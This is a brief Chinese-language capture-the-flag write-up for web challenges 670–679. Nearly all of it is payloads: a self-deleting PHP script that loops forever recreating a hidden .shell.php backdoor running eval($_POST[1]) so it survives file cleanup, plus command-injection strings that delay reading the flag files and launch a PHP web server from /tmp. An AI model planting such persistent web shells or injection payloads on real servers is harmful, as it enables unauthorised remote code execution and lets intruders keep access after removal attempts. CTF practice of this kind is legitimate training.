web670-web676

写一个.shell.php

因为rm -rf *不会删掉开头为.的文件

写入内存马,就算删掉了文件内存马还存在

1
2
3
4
5
6
7
8
9
10
11
<?php
    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);
    $file = '.shell.php';
    $code = '<?php @eval($_POST[1]);?>';
    while (1) {
        file_put_contents($file, $code);
        usleep(5000);
    }
?>

web677-web678

会删掉所有文件但是不会杀掉进程,那就留一个进程延时读取/f*文件

1
cmd=system('sleep 9;cat /f*');

web679

这里check之后直接404了,但是依然没有杀掉进程

先到/tmp写个index.php,然后在/tmp手动开启一个web服务

1
cmd=system("sleep 5;php -S 0.0.0.0:80 -t /tmp/");